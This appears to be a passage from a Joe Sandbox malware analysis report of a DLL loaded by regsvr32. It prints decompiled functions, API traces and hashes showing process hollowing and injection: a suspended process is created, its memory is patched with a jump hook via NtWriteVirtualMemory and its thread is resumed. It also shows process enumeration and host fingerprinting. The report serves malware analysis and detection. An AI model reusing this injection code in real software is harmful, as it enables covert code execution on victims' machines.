        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
        • String ID: 0$cdcdwqwqwq$sadccdcdsasa
        • API String ID: 2002808388-2319545179
        • Opcode ID: d9b7306b822ef4c75abda3a87e59d709b369751e76082ecbaf1197e7706a0768
        • Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
        • Opcode Fuzzy Hash: d9b7306b822ef4c75abda3a87e59d709b369751e76082ecbaf1197e7706a0768
        • Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 82%
        			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
        				long _v8;
        				char _v16;
        				short _v144;
        				short _v664;
        				void* _t19;
        				struct HINSTANCE__* _t22;
        				long _t23;
        				long _t24;
        				char* _t27;
        				WCHAR* _t32;
        				long _t33;
        				void* _t38;
        				void* _t49;
        				struct _SECURITY_ATTRIBUTES* _t53;
        				void* _t54;
        				intOrPtr* _t55;
        				void* _t57;
        
        				_t49 = __edx;
        				OutputDebugStringA("Hello qqq"); // executed
        				if(_a8 != 1) {
        					if(_a8 != 0) {
        						L12:
        						return 1;
        					}
        					SetLastError(0xaa);
        					L10:
        					return 0;
        				}
        				E100085EF();
        				_t19 = E1000980C( &_v16);
        				_t57 = _t49;
        				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
        					goto L12;
        				} else {
        					E10008F78();
        					GetModuleHandleA(0);
        					_t22 = _a4;
        					 *0x1001e69c = _t22;
        					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
        					_t24 = GetLastError();
        					if(_t23 != 0 && _t24 != 0x7a) {
        						memset( &_v144, 0, 0x80);
        						_t55 = _t54 + 0xc;
        						_t53 = 0;
        						do {
        							_t27 = E100095C7(_t53);
        							_a8 = _t27;
        							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
        							E100085C2( &_a8);
        							_t53 =  &(_t53->nLength);
        						} while (_t53 < 0x2710);
        						E10012A5B( *0x1001e69c);
        						 *_t55 = 0x7c3;
        						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
        						 *_t55 = 0xb4e;
        						_t32 = E100095E1(0x1001ba28);
        						_a8 = _t32;
        						_t33 = GetFileAttributesW(_t32); // executed
        						_push( &_a8);
        						if(_t33 == 0xffffffff) {
        							E100085D5();
        							_v8 = 0;
        							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
        							 *0x1001e6a8 = _t38;
        							if(_t38 == 0) {
        								goto L10;
        							}
        							goto L12;
        						}
        						E100085D5();
        					}
        					goto L10;
        				}
        			}

        APIs
        • OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
        • SetLastError.KERNEL32(000000AA), ref: 100060D7
          • Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
          • Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
          • Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
        • GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
        • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
        • GetLastError.KERNEL32 ref: 10005FEF
        • memset.MSVCRT ref: 10006013
        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
        • GetFileAttributesW.KERNEL32(00000000), ref: 10006083
        • CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
        • String ID: Hello qqq
        • API String ID: 3435743081-3610097158
        • Opcode ID: 6d402a79815b98af21a7f787fe15b69dd9dc40bdd27b4757cb6b1cb9915066dd
        • Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
        • Opcode Fuzzy Hash: 6d402a79815b98af21a7f787fe15b69dd9dc40bdd27b4757cb6b1cb9915066dd
        • Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        APIs
        • VirtualAlloc.KERNEL32(00000000,00000814,00003000,00000040,00000814,10077380), ref: 100779EB
        • VirtualAlloc.KERNEL32(00000000,000004CA,00003000,00000040,100773E0), ref: 10077A22
        • VirtualAlloc.KERNEL32(00000000,00028122,00003000,00000040), ref: 10077A82
        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077AB8
        • VirtualProtect.KERNEL32(10000000,00000000,00000004,1007790D), ref: 10077BBD
        • VirtualProtect.KERNEL32(10000000,00001000,00000004,1007790D), ref: 10077BE4
        • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D), ref: 10077CB1
        • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D,?), ref: 10077D07
        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077D23
        Memory Dump Source
        • Source File: 00000004.00000002.516721400.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10077000_regsvr32.jbxd
        Similarity
        • API ID: Virtual$Protect$Alloc$Free
        • String ID:
        • API String ID: 2574235972-0
        • Opcode ID: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
        • Instruction ID: e61e719fcc5ffd65f3e7435c319bc58e36d786470a44bd70215d6a9d31556276
        • Opcode Fuzzy Hash: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
        • Instruction Fuzzy Hash: F8D18D767086009FDB11CF14C8C0B927BA6FF8C750B194599ED6D9F25AD7B4B810CBA4
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 93%
        			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
        				long _v8;
        				long _v12;
        				void* _v16;
        				intOrPtr _v23;
        				void _v24;
        				long _v28;
        				void* _v568;
        				void _v744;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				struct HINSTANCE__* _t32;
        				intOrPtr _t33;
        				intOrPtr _t35;
        				void* _t39;
        				intOrPtr _t43;
        				void* _t63;
        				long _t65;
        				void* _t70;
        				void** _t73;
        				void* _t74;
        
        				_t73 = __edx;
        				_t63 = __ecx;
        				_t74 = 0;
        				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
        					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
        					_t74 = _t39;
        					if(_t74 != 0) {
        						memset( &_v744, 0, 0x2cc);
        						_v744 = 0x10002;
        						_push( &_v744);
        						_t43 =  *0x1001e684; // 0x219faa0
        						_push(_t73[1]);
        						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
        							_t70 = _v568;
        							_v12 = _v12 & 0x00000000;
        							_v24 = 0xe9;
        							_t65 = 5;
        							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
        							_v8 = _t65;
        							_v16 = _t70;
        							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
        								L6:
        								_t74 = 0;
        							} else {
        								_v28 = _v28 & 0x00000000;
        								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
        									goto L6;
        								}
        							}
        						}
        					}
        				}
        				_t32 =  *0x1001e77c; // 0x0
        				if(_t32 != 0) {
        					FreeLibrary(_t32);
        					 *0x1001e77c =  *0x1001e77c & 0x00000000;
        				}
        				_t33 =  *0x1001e784; // 0x0
        				if(_t33 != 0) {
        					_t35 =  *0x1001e684; // 0x219faa0
        					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
        					E1000861A(0x1001e784, 0xfffffffe);
        				}
        				return _t74;
        			}

        APIs
          • Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
          • Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605
        • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
          • Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
          • Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
          • Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
          • Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
          • Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
        • memset.MSVCRT ref: 1000CBB8
        • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
        • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
        • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
        • String ID:
        • API String ID: 317994034-0
        • Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
        • Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
        • Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
        • Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 248 1000aba3-1000abc7 CreateToolhelp32Snapshot 249 1000ac38-1000ac3e 248->249 250 1000abc9-1000abf2 memset Process32First 248->250 251 1000ac02-1000ac13 call 1000ccc0 250->251 252 1000abf4-1000ac00 250->252 256 1000ac15-1000ac26 Process32Next 251->256 257 1000ac28-1000ac35 CloseHandle 251->257 252->249 256->251 256->257 257->249
        C-Code - Quality: 100%
        			E1000ABA3(intOrPtr __ecx, void* __edx) {
        				void* _v304;
        				void* _v308;
        				signed int _t14;
        				signed int _t15;
        				void* _t22;
        				intOrPtr _t28;
        				void* _t31;
        				intOrPtr _t33;
        				void* _t40;
        				void* _t42;
        
        				_t33 = __ecx;
        				_t31 = __edx; // executed
        				_t14 = CreateToolhelp32Snapshot(2, 0);
        				_t42 = _t14;
        				_t15 = _t14 | 0xffffffff;
        				if(_t42 != _t15) {
        					memset( &_v304, 0, 0x128);
        					_v304 = 0x128;
        					if(Process32First(_t42,  &_v304) != 0) {
        						while(1) {
        							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
        							_t40 = _t22;
        							if(_t40 == 0) {
        								break;
        							}
        							_t33 =  *0x1001e684; // 0x219faa0
        							if(Process32Next(_t42,  &_v308) != 0) {
        								continue;
        							}
        							break;
        						}
        						CloseHandle(_t42);
        						_t15 = 0 | _t40 == 0x00000000;
        					} else {
        						_t28 =  *0x1001e684; // 0x219faa0
        						 *((intOrPtr*)(_t28 + 0x30))(_t42);
        						_t15 = 0xfffffffe;
        					}
        				}
        				return _t15;
        			}

        APIs
        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
        • memset.MSVCRT ref: 1000ABD6
        • Process32First.KERNEL32(00000000,?), ref: 1000ABED
        • Process32Next.KERNEL32(00000000,?), ref: 1000AC21
        • CloseHandle.KERNEL32(00000000), ref: 1000AC2E
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
        • String ID:
        • API String ID: 1267121359-0
        • Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
        • Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
        • Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
        • Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 94%
        			E1000B7A8(WCHAR* __ecx, void* __edx) {
        				long _v8;
        				long _v12;
        				WCHAR* _v16;
        				short _v528;
        				short _v1040;
        				short _v1552;
        				WCHAR* _t27;
        				signed int _t29;
        				void* _t33;
        				long _t38;
        				WCHAR* _t43;
        				WCHAR* _t56;
        
        				_t44 = __ecx;
        				_v8 = _v8 & 0x00000000;
        				_t43 = __edx;
        				_t56 = __ecx;
        				memset(__edx, 0, 0x100);
        				_v12 = 0x100;
        				GetComputerNameW( &_v528,  &_v12);
        				lstrcpynW(_t43,  &_v528, 0x100);
        				_t27 = E100095E1(_t44, 0xa88);
        				_v16 = _t27;
        				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
        				asm("sbb eax, eax");
        				_v8 = _v8 &  ~_t29;
        				E100085D5( &_v16);
        				_t33 = E1000C392(_t43);
        				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
        				lstrcatW(_t43, _t56);
        				_t38 = E1000C392(_t43);
        				_v12 = _t38;
        				CharUpperBuffW(_t43, _t38);
        				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
        			}

        APIs
        • memset.MSVCRT ref: 1000B7C5
        • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
        • lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
        • GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821
          • Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D
        • lstrcatW.KERNEL32 ref: 1000B85A
        • CharUpperBuffW.USER32(?,00000000), ref: 1000B86C
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
        • String ID:
        • API String ID: 3410906232-0
        • Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
        • Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
        • Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
        • Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 275 10028d00-10028d18 276 10028d36 275->276 277 10028d1a-10028d34 275->277 278 10028d3c-10028d4d 276->278 277->278 279 10028d6b-10028d72 278->279 280 10028d4f-10028d69 278->280 281 10028d78-10028d9f 279->281 280->281 282 10028da1-10028db4 281->282 283 10028db6-10028dc6 281->283 284 10028dcc-10028df3 GetSystemDirectoryW 282->284 283->284 285 10028e02-10028e38 VirtualProtectEx 284->285 286 10028df5-10028dfd 284->286 287 10028e54-10028e85 285->287 288 10028e3a-10028e4e 285->288 286->285 289 10028ea0-10028ec3 287->289 290 10028e87-10028e9b 287->290 288->287 291 10028ec5-10028eda 289->291 292 10028edd-10028ef4 289->292 290->289 291->292 293 10028f00-10028f0b 292->293 294 10028f34-10028f57 GetSystemDirectoryW 293->294 295 10028f0d-10028f2a 293->295 297 10028f75-10028fc0 294->297 298 10028f59-10028f6f 294->298 295->294 296 10028f2c-10028f32 295->296 296->293 296->294 300 10028fc5-10028fc9 297->300 298->297 301 10028fcb-10028fe5 300->301 302 10028fef 300->302 303 10028ff2-10029003 301->303 304 10028fe7-10028fed 301->304 302->303 305 10029005-10029015 303->305 306 10029018-1002902c 303->306 304->300 304->302 305->306 307 10029030-10029039 306->307 308 1002903b-10029057 307->308 309 10029059-1002908b 307->309 308->307 308->309 310 10029090-1002909b 309->310 311 100290cb-100290d4 310->311 312 1002909d-100290c1 310->312 312->311 313 100290c3-100290c9 312->313 313->310 313->311
        APIs
        • GetSystemDirectoryW.KERNEL32(10076908,00000744), ref: 10028DE1
        • VirtualProtectEx.KERNEL32(000000FF,101159C8,000051F0,00000040,10114064), ref: 10028E25
        Memory Dump Source
        • Source File: 00000004.00000002.516656148.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: DirectoryProtectSystemVirtual
        • String ID:
        • API String ID: 648172718-0
        • Opcode ID: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
        • Instruction ID: 8567422235b8483302f276b06f5c76c9c9f5ec01d0adbca6e2a98c3bb5a49452
        • Opcode Fuzzy Hash: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
        • Instruction Fuzzy Hash: 6AA1D435A046F14FE7349B388DD81E83FB2EB99312B59476AD4C4A72A5D2BE4CC4CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 314 1000ca25-1000ca45 call 1000c8fd 317 1000cb73-1000cb76 314->317 318 1000ca4b-1000ca6c call 1000a86d 314->318 321 1000ca72-1000ca74 318->321 322 1000cb63-1000cb72 call 1000861a 318->322 323 1000cb51-1000cb61 call 1000861a 321->323 324 1000ca7a 321->324 322->317 323->322 327 1000ca7d-1000ca7f 324->327 330 1000cb42-1000cb4b 327->330 331 1000ca85-1000ca9b call 1000ae66 327->331 330->321 330->323 334 1000cb00-1000cb04 331->334 335 1000ca9d-1000cab0 call 1000cb77 331->335 336 1000cb06-1000cb08 334->336 337 1000cb2f-1000cb3c 334->337 335->334 342 1000cab2-1000caca 335->342 339 1000cb19-1000cb29 336->339 340 1000cb0a-1000cb10 336->340 337->327 337->330 339->337 340->339 342->334 345 1000cacc-1000cae7 GetLastError ResumeThread 342->345 346 1000cae9-1000caf4 345->346 347 1000cafc-1000cafd CloseHandle 345->347 349 1000caf6 346->349 350 1000caf7 346->350 347->334 349->350 350->347
        C-Code - Quality: 89%
        			E1000CA25(intOrPtr __edx) {
        				signed int _v8;
        				intOrPtr _v12;
        				signed int _v16;
        				intOrPtr _v20;
        				char _v24;
        				void* _v36;
        				char _v40;
        				char _v80;
        				char _t37;
        				intOrPtr _t38;
        				void* _t45;
        				intOrPtr _t47;
        				intOrPtr _t48;
        				intOrPtr _t50;
        				intOrPtr _t52;
        				void* _t54;
        				intOrPtr _t57;
        				long _t61;
        				intOrPtr _t62;
        				signed int _t65;
        				signed int _t68;
        				signed int _t82;
        				void* _t85;
        				char _t86;
        
        				_v8 = _v8 & 0x00000000;
        				_v20 = __edx;
        				_t65 = 0;
        				_t37 = E1000C8FD( &_v8);
        				_t86 = _t37;
        				_v24 = _t86;
        				_t87 = _t86;
        				if(_t86 == 0) {
        					return _t37;
        				}
        				_t38 =  *0x1001e688; // 0x2120590
        				E1000A86D( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
        				_t82 = _v8;
        				_t68 = 0;
        				_v16 = 0;
        				if(_t82 == 0) {
        					L20:
        					E1000861A( &_v24, 0);
        					return _t65;
        				}
        				while(_t65 == 0) {
        					while(_t65 == 0) {
        						asm("stosd");
        						asm("stosd");
        						asm("stosd");
        						asm("stosd");
        						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
        						_t92 = _t45;
        						if(_t45 >= 0) {
        							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
        							if(_t54 != 0) {
        								_t57 =  *0x1001e684; // 0x219faa0
        								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
        								if(_t85 != 0) {
        									GetLastError();
        									_t61 = ResumeThread(_v36);
        									_t62 =  *0x1001e684; // 0x219faa0
        									if(_t61 != 0) {
        										_push(0xea60);
        										_push(_t85);
        										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
        											_t65 = _t65 + 1;
        										}
        										_t62 =  *0x1001e684; // 0x219faa0
        									}
        									CloseHandle(_t85);
        								}
        							}
        						}
        						if(_v40 != 0) {
        							if(_t65 == 0) {
        								_t52 =  *0x1001e684; // 0x219faa0
        								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
        							}
        							_t48 =  *0x1001e684; // 0x219faa0
        							 *((intOrPtr*)(_t48 + 0x30))(_v36);
        							_t50 =  *0x1001e684; // 0x219faa0
        							 *((intOrPtr*)(_t50 + 0x30))(_v40);
        						}
        						_t68 = _v16;
        						_t47 = _v12 + 1;
        						_v12 = _t47;
        						if(_t47 < 2) {
        							continue;
        						} else {
        							break;
        						}
        					}
        					_t82 = _v8;
        					_t68 = _t68 + 1;
        					_v16 = _t68;
        					if(_t68 < _t82) {
        						continue;
        					} else {
        						break;
        					}
        					do {
        						goto L19;
        					} while (_t82 != 0);
        					goto L20;
        				}
        				L19:
        				E1000861A(_t86, 0xfffffffe);
        				_t86 = _t86 + 4;
        				_t82 = _t82 - 1;
        			}

        APIs
          • Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
          • Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
          • Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
          • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
          • Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
          • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
          • Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
        • GetLastError.KERNEL32(?,00000001), ref: 1000CACC
        • ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
        • CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
        • String ID:
        • API String ID: 1274669455-0
        • Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
        • Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
        • Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
        • Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 351 1000b998-1000b9b8 GetTokenInformation 352 1000b9ba-1000b9c3 GetLastError 351->352 353 1000b9fe 351->353 352->353 355 1000b9c5-1000b9d5 call 10008604 352->355 354 1000ba00-1000ba04 353->354 358 1000b9d7-1000b9d9 355->358 359 1000b9db-1000b9ee GetTokenInformation 355->359 358->354 359->353 360 1000b9f0-1000b9fc call 1000861a 359->360 360->358
        C-Code - Quality: 86%
        			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
        				long _v8;
        				void* _v12;
        				void* _t12;
        				void* _t20;
        				void* _t22;
        				union _TOKEN_INFORMATION_CLASS _t28;
        				void* _t31;
        
        				_push(_t22);
        				_push(_t22);
        				_t31 = 0;
        				_t28 = __edx;
        				_t20 = _t22;
        				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
        					L6:
        					_t12 = _t31;
        				} else {
        					_t31 = E10008604(_v8);
        					_v12 = _t31;
        					if(_t31 != 0) {
        						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
        							goto L6;
        						} else {
        							E1000861A( &_v12, _t16);
        							goto L3;
        						}
        					} else {
        						L3:
        						_t12 = 0;
        					}
        				}
        				return _t12;
        			}

        APIs
        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
        • GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
          • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: InformationToken$AllocErrorHeapLast
        • String ID:
        • API String ID: 4258577378-0
        • Opcode ID: c9dc3b6da51a4adb2593ed558e7881c6b5e21b29452045dd37928f68b6e12adc
        • Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
        • Opcode Fuzzy Hash: c9dc3b6da51a4adb2593ed558e7881c6b5e21b29452045dd37928f68b6e12adc
        • Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 363 1000ae66-1000aeb3 memset CreateProcessW
        C-Code - Quality: 47%
        			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
        				struct _STARTUPINFOW _v72;
        				signed int _t11;
        				WCHAR* _t15;
        				int _t19;
        				struct _PROCESS_INFORMATION* _t20;
        
        				_t20 = __edx;
        				_t15 = __ecx;
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				_t19 = 0x44;
        				memset( &_v72, 0, _t19);
        				_v72.cb = _t19;
        				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
        				asm("sbb eax, eax");
